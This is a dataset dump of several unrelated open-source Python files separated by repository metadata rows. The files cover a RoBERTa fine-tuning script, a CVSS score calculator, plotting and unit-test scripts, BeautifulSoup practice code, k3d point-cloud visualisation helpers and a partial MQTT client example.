    # Only the micro-averaged precision/recall are reported; the macro and
    # weighted calls are made solely for their F1 values (the original bound
    # their precision/recall to unused throwaway names).
    precision, recall, f1_micro, _ = precision_recall_fscore_support(labels, preds, average='micro')
    _, _, f1_macro, _ = precision_recall_fscore_support(labels, preds, average='macro')
    _, _, f1_weighted, _ = precision_recall_fscore_support(labels, preds, average='weighted')
    acc = accuracy_score(labels, preds)
    return {
        'accuracy': acc,
        'f1-micro': f1_micro,
        'f1-macro': f1_macro,
        'f1-weighted': f1_weighted,
        'precision': precision,
        'recall': recall
    }
# %%
# Daten laden
raw_datasets = load_dataset('csv',data_files={'train':[train_data],'validation':[valid_data],'test': [test_data]},delimiter=delimeter_char)
# %%
# Tokenizer
RobertaTokenizer.from_pretrained(
model_to_use,
model_max_length=max_lengh_parameter
).save_pretrained(trained_model_name)
tokenizer = RobertaTokenizer.from_pretrained(
model_to_use,
model_max_length=max_lengh_parameter
)
tokenized_datasets = raw_datasets.map(tokenize_function, batched=True)
# %%
# Trainer Argumente
training_args = TrainingArguments(
output_dir=trained_model_name,
warmup_ratio=warmup_ratio_parameter,
weight_decay=weight_decay_parameter,
learning_rate=learning_rate_parameter,
fp16 = True,
evaluation_strategy="epoch",
num_train_epochs=epoch_count,
per_device_train_batch_size=batch_size,
overwrite_output_dir=True,
per_device_eval_batch_size=batch_size,
save_strategy="no",
logging_dir='logs',
logging_strategy= 'steps',
logging_steps=10,
push_to_hub=True,
hub_strategy="end")
# %%
# Modell laden
model = RobertaForSequenceClassification.from_pretrained(
model_to_use,
num_labels=label_count,
id2label=id2label_parameter,
label2id=label2id_parameter
)
# %%
# Trainer definieren
trainer = Trainer(
model=model,
args=training_args,
train_dataset=tokenized_datasets["train"],
eval_dataset=tokenized_datasets["validation"],
compute_metrics=compute_metrics,
)
# %%
# Trainieren
trainer.train()
# %%
# Evaluate for Classification Report
## Validation
predictions, labels, _ = trainer.predict(tokenized_datasets["validation"])
predictions = np.argmax(predictions, axis=1)
with open(validatipon_report_name,'w',encoding='utf-8') as f:
f.truncate(0) # Vorher File leeren
f.write(classification_report(y_pred=predictions,y_true=labels,target_names=label_names))
# %%
# Evaluate for Classification Report
## Test
predictions, labels, _ = trainer.predict(tokenized_datasets["test"])
predictions = np.argmax(predictions, axis=1)
with open(test_report_name,'w',encoding='utf-8') as f:
f.truncate(0) # Vorher File leeren
f.write(classification_report(y_pred=predictions,y_true=labels,target_names=label_names))
# %%
# Abspeichern
## Log speichern
with open(log_name, 'w',encoding='utf-8') as f:
f.truncate(0) # Vorher File leeren
for obj in trainer.state.log_history:
f.write(str(obj)+'\n')
## Modell speichern
trainer.save_model(trained_model_name)
tokenizer.save_pretrained(trained_model_name, push_to_hub=True)
# %%
| 30.342541 | 140 | 0.711307 |
171ce1b9a2152f3d9fb2b482b3a9dc061afe08d1
| 11,310 |
py
|
Python
|
Packs/CVSS/Scripts/CVSSCalculator/CVSSCalculator.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/CVSS/Scripts/CVSSCalculator/CVSSCalculator.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/CVSS/Scripts/CVSSCalculator/CVSSCalculator.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
from CommonServerPython import *
import math
from typing import Dict, Any
def round_up(n):
    """CVSS v3.1 'Roundup': smallest one-decimal value >= n (None passes through).

    Works on an integer scaled by 1e5 to avoid floating-point representation
    errors, mirroring the specification's reference implementation.
    """
    if n is None:
        return None
    scaled = int(n * 100000)
    remainder = scaled % 10000
    if remainder == 0:
        return scaled / 100000.0
    return math.floor(scaled / 10000 + 1) / 10.0
def main():
args = demisto.args()
version = args.get('version', '3.1')
vector_string = f"CVSS:{version}/"
values_map_options: Dict[str, Dict[str, Dict[str, Any]]] = {
"3.0": {
"AV": {
"X": None,
"N": 0.85,
"A": 0.62,
"L": 0.55,
"P": 0.2,
},
"AC": {
"X": None,
"L": 0.77,
"H": 0.44
},
"PR": {
"X": None,
"N": 0.85,
"L": {
"C": 0.68,
"U": 0.62
},
"H": {
"C": 0.5,
"U": 0.27
}
},
"UI": {
"X": None,
"N": 0.85,
"R": 0.62
},
"CIA": {
"X": None,
"N": 0,
"H": 0.56,
"L": 0.22,
},
"E": {
"X": 1,
"H": 1,
"F": 0.97,
"P": 0.94,
"U": 0.91
},
"RL": {
"X": 1,
"U": 1,
"W": 0.97,
"T": 0.96,
"O": 0.95
},
"RC": {
"X": 1,
"C": 1,
"R": 0.96,
"U": 0.92
},
"CIAR": {
"X": 1,
"H": 1.5,
"M": 1,
"L": 0.5
}
},
"3.1": {
"AV": {
"X": None,
"N": 0.85,
"A": 0.62,
"L": 0.55,
"P": 0.2,
},
"AC": {
"X": None,
"L": 0.77,
"H": 0.44
},
"PR": {
"X": None,
"N": 0.85,
"L": {
"C": 0.68,
"U": 0.62
},
"H": {
"C": 0.5,
"U": 0.27
}
},
"UI": {
"X": None,
"N": 0.85,
"R": 0.56
},
"CIA": {
"X": None,
"N": 0,
"H": 0.56,
"L": 0.22,
},
"E": {
"X": 1,
"H": 1,
"F": 0.97,
"P": 0.94,
"U": 0.91
},
"RL": {
"X": 1,
"U": 1,
"W": 0.97,
"T": 0.96,
"O": 0.95
},
"RC": {
"X": 1,
"C": 1,
"R": 0.96,
"U": 0.92
},
"CIAR": {
"X": 1,
"H": 1.5,
"M": 1,
"L": 0.5
}
}
}
version = args.get('version')
values_map = values_map_options[version]
value_list = list()
for k, v in args.items():
if v != "X" and k != "version":
value_list.append(f"{k}:{v}")
vector_string += "/".join(value_list)
###########################################
# Get all required values for calculations
###########################################
confidentiality = values_map['CIA'][args.get('C')]
modified_confidentiality = args.get('MC', "X")
modified_confidentiality = confidentiality if\
modified_confidentiality == "X" else values_map['CIA'][modified_confidentiality]
integrity = values_map['CIA'][args.get('I')]
modified_integrity = args.get('MI', "X")
modified_integrity = integrity if modified_integrity == "X" else values_map['CIA'][modified_integrity]
availability = values_map['CIA'][args.get('A')]
modified_availability = args.get('MA', "X")
modified_availability = availability if modified_availability == "X"\
else values_map['CIA'][modified_availability]
exploit_code_maturity = values_map["E"].get(args.get('E'), "X")
scope_changed = True if args.get('S') == "C" else False
modified_scope_changed = True if args.get('MS') == "C" else False
atack_vector = values_map['AV'].get(args.get('AV'), 0)
modified_attack_vector = args.get('MAV', "X")
modified_attack_vector = atack_vector if modified_attack_vector == "X"\
else values_map['AV'].get(modified_attack_vector, 0)
attack_complexity = values_map['AC'][args.get('AC')]
modified_attack_complexity = args.get('MAC', "X")
modified_attack_complexity = attack_complexity if modified_attack_complexity == "X"\
else values_map['AC'][modified_attack_complexity]
privileges_required = values_map['PR'][args.get('PR')]
if type(privileges_required) == dict:
privileges_required = privileges_required.get("C") if scope_changed or modified_scope_changed\
else privileges_required["U"]
modified_privileges_required = args.get('MPR', "X")
if modified_privileges_required == "X":
modified_privileges_required = privileges_required
elif type(modified_privileges_required) == dict:
modified_privileges_required = modified_privileges_required["C"] if scope_changed or\
modified_scope_changed else modified_privileges_required["U"]
else:
modified_privileges_required = values_map['PR'][modified_privileges_required]
user_interaction = values_map['UI'][args.get('UI')]
modified_user_interaction = args.get('MUI', "X")
modified_user_interaction = user_interaction if modified_user_interaction == "X"\
else values_map['UI'][modified_user_interaction]
remediation_level = values_map['RL'][args.get('RL', "X")]
report_confidence = values_map['RC'][args.get('RC', "X")]
confidentiality_requirement = values_map['CIAR'][args.get('CR', "X")]
integrity_requirement = values_map['CIAR'][args.get('IR', "X")]
availability_requirement = values_map['CIAR'][args.get('AR', "X")]
###########################################
# Base Metric Equation calculations
###########################################
# Impact Sub-Score
iss = 0
if version in ['3.0', '3.1']:
iss = 1 - ((1 - confidentiality) * (1 - integrity) * (1 - availability))
# Impact
impact = 0.0
if version in ['3.0', '3.1']:
if not scope_changed:
impact = 6.42 * iss
else:
impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
# Exploitability
exploitability = 0.0
if version in ['3.0', '3.1']:
exploitability = 8.22 * atack_vector * attack_complexity * privileges_required * user_interaction
# Base Score
base_score = 0.0
if version in ['3.0', '3.1']:
base_score = 0
if impact > 0:
multiplier = 1.0
if scope_changed:
multiplier = 1.08
calculated_value = multiplier * (impact + exploitability)
base_score = calculated_value if calculated_value < 10.0 else 10.0
base_score = round_up(base_score)
###########################################
# Temporal Metric calculations
###########################################
temporal_score_roundup = 0.0
if version in ['3.0', '3.1']:
temporal_score_roundup = base_score * exploit_code_maturity * remediation_level * report_confidence
# Environmental Metrics
modified_impact_sub_score = 0.0
modified_impact = 0.0
modified_exploitability = 0.0
if version in ['3.0', '3.1']:
calculatedmodified_impact_sub_score = (
1 - (
(1 - confidentiality_requirement * modified_confidentiality)
* (1 - integrity_requirement * modified_integrity)
* (1 - availability_requirement * modified_availability)
)
)
modified_impact_sub_score = calculatedmodified_impact_sub_score if calculatedmodified_impact_sub_score < 0.915\
else 0.915
if version in ['3.0', '3.1']:
if modified_scope_changed:
if version == '3.0':
modified_impact = 7.52 * (modified_impact_sub_score - 0.029) - 3.25 *\
(modified_impact_sub_score * 0.9731 - 0.02) ** 15
elif version == '3.1':
modified_impact = 7.52 * (modified_impact_sub_score - 0.029) - 3.25 *\
(modified_impact_sub_score * 0.9731 - 0.02) ** 13
else:
modified_impact = 6.42 * modified_impact_sub_score
modified_exploitability = 8.22 * modified_attack_vector *\
modified_attack_complexity * modified_privileges_required * modified_user_interaction
# Environmental Score
environmental_score = 0.0
if version in ['3.0', '3.1']:
environmental_score = 0
if modified_impact > 0:
exponential = 1.0
if modified_scope_changed:
exponential = 1.08
calculated_value = exponential * (modified_impact + modified_exploitability)
calculated_value = calculated_value if calculated_value < 10 else 10
calculated_value = round_up(calculated_value)
environmental_score = calculated_value * exploit_code_maturity * remediation_level * report_confidence
environmental_score = round_up(environmental_score)
# Round values
iss = round_up(iss)
impact = round_up(impact)
exploitability = round_up(exploitability)
base_score = round_up(base_score)
temporal_score_roundup = round_up(temporal_score_roundup)
modified_impact_sub_score = round_up(modified_impact_sub_score)
modified_impact = round_up(modified_impact)
modified_exploitability = round_up(modified_exploitability)
environmental_score = round_up(environmental_score)
entry = {
"VectorString": vector_string,
"Version": version,
"ImpactSubScore": iss,
"Impact": impact,
"Exploitability": exploitability,
"BaseScore": base_score,
"TemporalScore": temporal_score_roundup,
"ModifiedImpactSubScore": modified_impact_sub_score,
"ModifiedImpact": modified_impact,
"ModifiedExploitability": modified_exploitability,
"EnvironmentalScore": environmental_score
}
hrentry = {k: v for k, v in entry.items() if v}
markdown = tableToMarkdown('CVSS Score:', hrentry)
results = CommandResults(
readable_output=markdown,
outputs_prefix='',
outputs_key_field='',
outputs={
'CVSS(val.VectorString === obj.VectorString && val.Version === obj.Version)': entry
}
)
return results
# Entry point. Besides the usual "__main__", the list also accepts
# "builtin"/"builtins" — presumably the XSOAR/Demisto script runtime sets
# __name__ to those values (CommandResults/return_results above suggest an
# XSOAR automation) — TODO confirm against the platform docs.
if __name__ in ['__main__', 'builtin', 'builtins']:
    res = main()
    return_results(res)
| 33.862275 | 119 | 0.496994 |
172bdfd38a3b4a68ec4d5979302aa83645e5817e
| 1,952 |
py
|
Python
|
Blatt5/src/script.py
|
lewis206/Computational_Physics
|
06ad6126685eaf65f5834bfe70ebd91b33314395
|
[
"MIT"
] | null | null | null |
Blatt5/src/script.py
|
lewis206/Computational_Physics
|
06ad6126685eaf65f5834bfe70ebd91b33314395
|
[
"MIT"
] | null | null | null |
Blatt5/src/script.py
|
lewis206/Computational_Physics
|
06ad6126685eaf65f5834bfe70ebd91b33314395
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
from scipy.optimize import curve_fit
# Use a larger default font size for all plots.
matplotlib.rcParams.update({'font.size': 20})
# Exercise 1: render the reconstructed images for k = 512 (""), 10, 20, 50.
for i in ["", 10, 20, 50]:
    # Load pixel values from the corresponding data file.
    a = np.genfromtxt("output/data" + str(i) + ".txt", unpack=True)
    # BUG FIX: ndarray.reshape() returns a NEW array; the original call
    # discarded its result, so flat data was never actually reshaped.
    a = a.reshape(512, 512)
    # Plot the image for k = 512, 10, 20, 50 kept components.
    plt.figure(figsize=(12, 12))
    plt.imshow(a, cmap="gray")
    plt.tight_layout()
    plt.savefig("output/Bild" + str(i) + ".pdf")
    # Close the figure so the loop does not accumulate open figures.
    plt.close()
# Exercise 2, generate data from file: three timing series per matrix size.
t_random, t_LU, t_solve = np.genfromtxt("output/times.txt", unpack=True)
# Fitting just for fun, to get an idea for the order of the exponent (because of log-log we fitted with a linear function)
# i.e. fit log(t) = a + N*log(n), a power law t ~ n^N in linear space.
num = np.arange(1,len(t_random)+1)
# Extended x range used only for drawing the fitted curves.
num_new = np.arange(12, 2000)
# NOTE: err_* are the covariance matrices returned by curve_fit, not errors.
param_LU, err_LU = curve_fit(lambda x, a, N: a+x*N, np.log(num), np.log(t_LU))
param_random, err_random = curve_fit(lambda x, a, N: a+x*N, np.log(num), np.log(t_random))
param_solve, err_solve = curve_fit(lambda x, a, N: a+x*N, np.log(num), np.log(t_solve))
# Plotting for three different times: data as crosses, fits as lines,
# fitted exponent shown in the legend label.
plt.figure(figsize=(12,8))
plt.plot(num, t_random, "x", label=r"$t_\mathrm{random}$", color="C0")
plt.plot(num_new, np.exp(param_random[0]+np.log(num_new)*param_random[1]), label=r"$N^{"+f"{param_random[1]:.2f}"+r"}$- Random", color="C0")
plt.plot(num, t_LU, "x", label=r"$t_\mathrm{LU}$", color="C1")
plt.plot(num_new, np.exp(param_LU[0]+np.log(num_new)*param_LU[1]), label=r"$N^{"+f"{param_LU[1]:.2f}"+r"}$- LU Zerlegung", color="C1")
plt.plot(num, t_solve, "x", label=r"$t_\mathrm{solve}$", color="C2")
plt.plot(num_new, np.exp(param_solve[0]+np.log(num_new)*param_solve[1]), label=r"$N^{"+f"{param_solve[1]:.2f}"+r"}$- Solve", color="C2")
# Log-log axes so the power laws appear as straight lines.
plt.yscale("log")
plt.xscale("log")
plt.xlabel(r"Dimension $N$")
plt.ylabel(r"Zeit $t\, / \,\mathrm{s}$")
plt.grid()
plt.legend(loc="best")
plt.tight_layout()
plt.savefig("output/times.pdf")
| 44.363636 | 140 | 0.682377 |
e505c60ef60276d1b46cf32dd6e3eec9d7a56586
| 714 |
py
|
Python
|
src/unittest/python/erweitert/test_allgemein.py
|
dlangheiter-tgm/test-mirror
|
9878da44953c40abc1df0311f275c3eebc2e876b
|
[
"MIT"
] | null | null | null |
src/unittest/python/erweitert/test_allgemein.py
|
dlangheiter-tgm/test-mirror
|
9878da44953c40abc1df0311f275c3eebc2e876b
|
[
"MIT"
] | null | null | null |
src/unittest/python/erweitert/test_allgemein.py
|
dlangheiter-tgm/test-mirror
|
9878da44953c40abc1df0311f275c3eebc2e876b
|
[
"MIT"
] | null | null | null |
"""
Created on 27.12.2013
@author: Walter Rafeiner-Magor <[email protected]>
"""
import unittest
from bruch.Bruch import *
class TestAllgemein(unittest.TestCase):
    """General tests for the Bruch (fraction) class: integer rendering
    and the private ``__makeBruch`` factory."""

    def setUp(self):
        # Fresh fixture fractions before every test.
        self.frac = Bruch(3, 2)
        self.frac_copy = Bruch(self.frac)
        self.frac_two = Bruch(4, 2)

    def tearDown(self):
        # Drop the fixtures again after each test.
        del self.frac, self.frac_copy, self.frac_two

    def testInteger(self):
        # A fraction with denominator 1 renders as a plain integer.
        self.frac_copy = Bruch(3, 1)
        assert str(self.frac_copy) == '(3)'

    def test_makeBruchTypeError(self):
        # The private factory rejects non-numeric arguments.
        self.assertRaises(TypeError, Bruch._Bruch__makeBruch, "other")

    def test_makeBruchInt(self):
        # The private factory wraps a plain int; the numerator must match.
        wanted = 3
        produced = Bruch._Bruch__makeBruch(wanted)
        assert produced.zaehler == wanted
| 21.636364 | 70 | 0.609244 |
e5394c626cc694eb29672ca3c2176a352e19433c
| 23 |
py
|
Python
|
test/test.py
|
ruum42/pySchloss
|
f1415b48187ef0966019051e7681ae59a274215b
|
[
"Apache-2.0"
] | 12 |
2015-02-14T15:15:40.000Z
|
2020-06-23T12:32:05.000Z
|
test/test.py
|
hassoon1986/pySchloss
|
f1415b48187ef0966019051e7681ae59a274215b
|
[
"Apache-2.0"
] | null | null | null |
test/test.py
|
hassoon1986/pySchloss
|
f1415b48187ef0966019051e7681ae59a274215b
|
[
"Apache-2.0"
] | 7 |
2015-07-29T18:54:37.000Z
|
2021-01-27T17:24:37.000Z
|
__author__ = 'madmike'
| 11.5 | 22 | 0.73913 |
c1e91243ba2517f0c7942cf7a5db8428c599ff05
| 1,804 |
py
|
Python
|
python/douban/test/testBs4.py
|
TimVan1596/ACM-ICPC
|
07f7d728db1ecd09c5a3d0f05521930b14eb9883
|
[
"Apache-2.0"
] | 1 |
2019-05-22T07:12:34.000Z
|
2019-05-22T07:12:34.000Z
|
python/douban/test/testBs4.py
|
TimVan1596/ACM-ICPC
|
07f7d728db1ecd09c5a3d0f05521930b14eb9883
|
[
"Apache-2.0"
] | 3 |
2021-12-10T01:13:54.000Z
|
2021-12-14T21:18:42.000Z
|
python/douban/test/testBs4.py
|
TimVan1596/ACM-ICPC
|
07f7d728db1ecd09c5a3d0f05521930b14eb9883
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
# @Time:2020/8/7 17:37
# @Author:TimVan
# @File:testBs4.py
# @Software:PyCharm
# from bs4 import BeautifulSoup
#
# file = open("./baidu.html", "rb")
# html = file.read()
# bs = BeautifulSoup(html, "html.parser")
# 1、Tag,标签
# print(bs.title)
# print(bs.head)
# print(bs.a)
# print(type(bs.head))
# 2、NavigableString,简单理解为标签中的内容,即字符串
# res = bs.title.string
# print(bs.title.string)
# print(type(res))
# res = bs.a.attrs
# print(res)
# print(type(res))
# 3、BeautifulSoap,整个文档
# res = bs
# print(res)
# print(type(res))
# 4、Comment 注释类型
# res = bs.a.string
# print(res)
# print(type(res))
from bs4 import BeautifulSoup

# BUG FIX: the original left the file handle open for the rest of the
# script; a context manager guarantees it is closed right after reading.
with open("./baidu.html", "rb") as file:
    html = file.read()
# Parse the page with Python's built-in HTML parser.
bs = BeautifulSoup(html, "html.parser")
# 对文档进行遍历
# res = bs.head.contents
# print(res)
# print(type(res))
# print(res[1])
# 对文档进行搜索
# ① find_all()
# 字符串过滤
# res = bs.find_all("a")
# print(res)
# 正则表达式
# import re
# res = bs.find_all(re.compile("a"))
# print(res)
# 方法,传入函数进行判断
# def is_exist_class(tag):
# # has_attr 返回true or false
# return tag.has_attr("class")
#
# # 注意内容可重复(交叉)
# res = bs.find_all(is_exist_class)
# print(res)
# key word args 参数
# res = bs.find_all(id="s-top-left")
# for item in res:
# print(item)
# res = bs.find_all(class_="carbon-text")
# for item in res:
# print(item)
# 存在content
# res = bs.find_all(content=True)
# for item in res:
# print(item)
# 文本参数
import re
# res = bs.find_all(text=['地图', '贴吧'])
# 正则表达式
# res = bs.find_all(text=re.compile('\d'))
# for item in res:
# print(item)
# limit,取多少个
# res = bs.find_all('a',limit=3)
# for item in res:
# print(item)
# css选择器
# res = bs.select('.carbon-text')
# res = bs.select('#tieba')
# res = bs.select('a[class="carbon-text"]')
# CSS selector: every <a> tag that is a direct child of a <div>.
res = bs.select('div>a')
for item in res:
    print(item)
| 17.514563 | 43 | 0.633592 |
de1591a2f189036b901f2843ae869ec8189e0b90
| 220 |
py
|
Python
|
klufweb/feed/admin.py
|
mseln/klufweb
|
a785d44415fde933723220fab7f18f2ae4fd748d
|
[
"Apache-2.0"
] | null | null | null |
klufweb/feed/admin.py
|
mseln/klufweb
|
a785d44415fde933723220fab7f18f2ae4fd748d
|
[
"Apache-2.0"
] | 5 |
2015-05-22T12:05:54.000Z
|
2015-05-22T12:09:06.000Z
|
klufweb/feed/admin.py
|
mseln/klufweb
|
a785d44415fde933723220fab7f18f2ae4fd748d
|
[
"Apache-2.0"
] | null | null | null |
# Django admin registration for the feed app's models; the customized
# ModelAdmin classes live alongside the models in feed.models.
from django.contrib import admin
from feed.models import NewsArticle, NewsArticleAdmin
from feed.models import Event, EventAdmin
admin.site.register(NewsArticle, NewsArticleAdmin)
admin.site.register(Event, EventAdmin)
| 31.428571 | 53 | 0.845455 |
a9e9292502b02f2c93833c4dd03a154fd7fb62bd
| 5,821 |
py
|
Python
|
python/tutlibs/visualization.py
|
Obarads/Point_Cloud_Tutorial
|
faf7ae8abf962ecea414cc7557dc35f4fca0e406
|
[
"MIT"
] | 1 |
2021-11-22T10:32:49.000Z
|
2021-11-22T10:32:49.000Z
|
python/tutlibs/visualization.py
|
Obarads/Point_Cloud_Tutorial
|
faf7ae8abf962ecea414cc7557dc35f4fca0e406
|
[
"MIT"
] | 1 |
2021-12-09T14:39:51.000Z
|
2021-12-09T14:39:51.000Z
|
python/tutlibs/visualization.py
|
Obarads/Point_Cloud_Tutorial
|
faf7ae8abf962ecea414cc7557dc35f4fca0e406
|
[
"MIT"
] | null | null | null |
import numpy as np
import k3d
from typing import List
from tutlibs.utils import color_range_rgb_to_8bit_rgb, rgb_to_hex, single_color
from tutlibs.operator import gather
class JupyterVisualizer:
    """Static helpers that build k3d objects (lines, points, voxels,
    meshes) for display in a Jupyter notebook."""

    def __init__(self) -> None:
        # The class is a namespace of staticmethods; instantiation only warns.
        print("Note: this class is staticmethod only.")
    @staticmethod
    def display(objects:list, camera_init:List[float]=None):
        """Visualize objects.
        Args:
            objects: object list (k3d drawables created by the methods below)
            camera_init: camera 9th vector (optional initial camera state).
        """
        plot = k3d.plot()
        for obj in objects:
            plot += obj
        if camera_init is not None:
            plot.camera = camera_init
        plot.display()
    @staticmethod
    def line(lines: np.ndarray, colors: np.ndarray = None, color_range: list = [0, 255],
             width=0.002, shader='simple'):
        """Create line objects for visualizer.
        Args:
            lines: start and end points of lines (N, 2, 3)
            colors: RGB (N, 3) or color code (N)
            color_range: color value range for RGB (min, max color value)
            width: width of lines on visualizer
        Note:
            N: number of lines
            NOTE(review): the mutable default ``color_range=[0, 255]`` is
            read-only here but is still a risky Python pattern.
        """
        N, _, _ = lines.shape
        # shader setup and spliting lines
        # Separator vertices are appended after each segment; presumably the
        # NaN coordinates break the polyline between segments in k3d — TODO confirm.
        if shader == 'thick':
            split_lines = np.concatenate([
                np.full((N, 1, 3), 1),
                np.full((N, 1, 3), np.nan),
                np.full((N, 1, 3), 1)
            ], axis=1, dtype=np.float32)
            split_colors = np.full((N, 3), fill_value=1, dtype=np.uint32)
        elif shader == 'simple':
            split_lines = np.concatenate([
                np.full((N, 1, 3), np.nan),
            ], axis=1, dtype=np.float32)
            split_colors = np.full((N, 1), fill_value=1, dtype=np.uint32)
            # split_colors = np.tile(colors[:, np.newaxis, :], (1, 3, 1)).reshape(-1, 3)
        else:
            raise NotImplementedError()
        # xyz setup: interleave segment endpoints with separator vertices,
        # then flatten to a (M, 3) vertex list.
        lines = np.concatenate([lines, split_lines], axis=1).reshape(-1, 3)
        # color setup (get color codes): one color code per emitted vertex.
        if colors is not None:
            colors = color_range_rgb_to_8bit_rgb(colors, color_range)
            colors = rgb_to_hex(colors)
            colors = np.hstack(
                [np.tile(colors.reshape(-1, 1), (1, 2)), split_colors]
            ).reshape(-1)
        else:
            colors = []
        obj_lines = k3d.line(lines, colors=colors, width=width, shader=shader)
        return obj_lines
    @staticmethod
    def point(xyz: np.ndarray, colors: np.ndarray = None, color_range: List[float]= [0, 255],
              point_size: float = 0.01):
        """Create a point cloud object for visualizer.
        Args:
            xyz: XYZ positions (N, 3)
            colors: RGB (N, 3) or color code (N)
            color_range: color value range for RGB (min, max color value)
            point_size: size of points on visualizer
        Note:
            N: number of points
        """
        # error check
        assert type(xyz) == np.ndarray
        assert type(colors) == np.ndarray or colors is None
        if colors is not None:
            assert len(colors.shape) in [
                1, 2], '{}, Expected colors is rgb (N, 3) or color codes (N).'.format(colors.shape)
            assert len(colors) == len(xyz)
        # xyz setup
        xyz = xyz.astype(np.float32)
        # color setup
        if colors is not None:
            # to 0 ~ 255 color range
            colors = color_range_rgb_to_8bit_rgb(colors, color_range)
            # to color code
            colors = rgb_to_hex(colors)
        else:
            colors = []
        obj_points = k3d.points(xyz, colors=colors, point_size=point_size, shader='flat')
        return obj_points
    @staticmethod
    def voxel(voxels: np.ndarray, color:int=0x0000ff):
        """Create voxel objects for visualizer.
        Args:
            voxels: voxel data, (N, N, N)
            color: hexadecimal voxel color, single color only
        Note:
            N: number of voxel on a side.
        """
        obj_voxel = k3d.voxels(voxels, color_map=(color), compression_level=1)
        # obj_voxel = k3d.sparse_voxels(voxels, [1, 1, 1], color_map=(color), compression_level=1)
        return obj_voxel
    @staticmethod
    def mesh(vertices: np.ndarray, edges: np.ndarray, colors: np.ndarray = None, color_range: List[float]=[0, 255]):
        """Create a double-sided mesh object for the visualizer.
        Args:
            vertices: vertex positions
            edges: triangle indices passed to k3d as ``indices``
            colors: per-vertex RGB (optional)
            color_range: color value range for RGB (min, max color value)
        """
        if colors is not None:
            # to 0 ~ 255 color range
            colors = color_range_rgb_to_8bit_rgb(colors, color_range)
            # to color code
            colors = rgb_to_hex(colors)
        else:
            colors = []
        obj_mesh = k3d.mesh(vertices=vertices, indices=edges, colors=colors, side='double')
        return obj_mesh
class JupyterVisualizerUtils:
    """Higher-level helpers built on top of JupyterVisualizer."""

    def __init__(self) -> None:
        # Namespace of staticmethods; instantiation only warns.
        print("Note: this class is staticmethod only.")
    @staticmethod
    def correspondence_line(source_xyz, target_xyz, corr_set, line_colors:str=None):
        """Create correspondence line for registration.
        Args:
            source_xyz: xyz of source points, (N, 3)
            target_xyz: xyz of target points, (M, 3)
            corr_set: indices of correspondences between source and target points (L, 2)
            line_colors: colors of correspondence lines (L, 3); defaults to blue
        """
        # Select the matched points on each side of the correspondence set.
        source_xyz = gather(source_xyz, corr_set[:, 0])
        target_xyz = gather(target_xyz, corr_set[:, 1])
        # Pair them up into (L, 2, 3) start/end coordinates.
        line_xyz = np.concatenate([source_xyz[:, np.newaxis, :], target_xyz[:, np.newaxis, :]], axis=1)
        if line_colors is None:
            line_colors = single_color("#0000ff", len(line_xyz))
        obj_line = JupyterVisualizer.line(line_xyz, width=0.06, colors=line_colors, color_range=[0, 255], shader='simple')
        return obj_line
| 35.493902 | 122 | 0.574644 |
99c7c801eb7060e1eaeaf99633bec510fa2b99e8
| 206 |
py
|
Python
|
foundation/patches/v0_0/update_erpnext_job_route.py
|
prafful1234/foundation
|
6fcb027e76eae8d307c3dd70436a9657ff681f01
|
[
"MIT"
] | 59 |
2017-03-15T08:14:52.000Z
|
2021-11-17T14:21:58.000Z
|
foundation/patches/v0_0/update_erpnext_job_route.py
|
prafful1234/foundation
|
6fcb027e76eae8d307c3dd70436a9657ff681f01
|
[
"MIT"
] | 147 |
2017-01-25T10:44:47.000Z
|
2020-11-05T04:24:22.000Z
|
foundation/patches/v0_0/update_erpnext_job_route.py
|
prafful1234/foundation
|
6fcb027e76eae8d307c3dd70436a9657ff681f01
|
[
"MIT"
] | 134 |
2017-03-14T14:04:21.000Z
|
2022-03-18T08:19:47.000Z
|
import frappe
def execute():
    """Patch: set the `route` of every Portal Job to "erpnext-job/<name>".

    Writes with update_modified=False so the patch does not bump each
    document's `modified` timestamp.
    """
    for job in frappe.get_all("Portal Job"):
        # BUG FIX: under Python 3, str.encode('utf-8') yields bytes and
        # str.format() renders it as "b'...'", corrupting the route.
        # job.name is already text, so format it directly.
        frappe.db.set_value("Portal Job", job.name, "route", "erpnext-job/{0}".format(job.name),
            update_modified=False)
| 25.75 | 106 | 0.699029 |
d87f35e3623a22088ffab8da999d951445fda9f4
| 1,270 |
py
|
Python
|
mqtt/mqtt_publish_und_subscribe.py
|
wichmann/RaspPI
|
168609cb237e59a4c895eae798c0dab052aab38b
|
[
"MIT"
] | null | null | null |
mqtt/mqtt_publish_und_subscribe.py
|
wichmann/RaspPI
|
168609cb237e59a4c895eae798c0dab052aab38b
|
[
"MIT"
] | null | null | null |
mqtt/mqtt_publish_und_subscribe.py
|
wichmann/RaspPI
|
168609cb237e59a4c895eae798c0dab052aab38b
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
# Notwendige Bibliothek installieren:
# pip3 install paho-mqtt
import time
import random
import paho.mqtt.client as mqtt
TOPIC = "test/topic"
def on_connect(mqttc, obj, flags, rc):
    """Connection callback: report the broker's connect result code."""
    print("rc: {}".format(rc))
def on_message(mqttc, obj, msg):
    """Message callback: print topic, QoS level and raw payload."""
    print("{} {} {}".format(msg.topic, msg.qos, msg.payload))
def on_publish(mqttc, obj, mid):
    """Publish callback: report the message id that was delivered."""
    print("mid: {}".format(mid))
def on_subscribe(mqttc, obj, mid, granted_qos):
    """Subscribe callback: report message id and the granted QoS levels."""
    print("Subscribed: {} {}".format(mid, granted_qos))
def on_log(mqttc, obj, level, string):
    # Log callback: echo the client's internal log line to stdout.
    # NOTE(review): defined but never attached to the client instance below.
    print(string)
# Create the client object for the connection to the MQTT broker.
mqttc = mqtt.Client()
# Attach the callback functions for the various events.
# NOTE(review): on_log is defined above but deliberately(?) not attached.
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.on_publish = on_publish
mqttc.on_subscribe = on_subscribe
# Connect to the broker.
mqttc.connect("192.168.24.129", port=1883, keepalive=120)
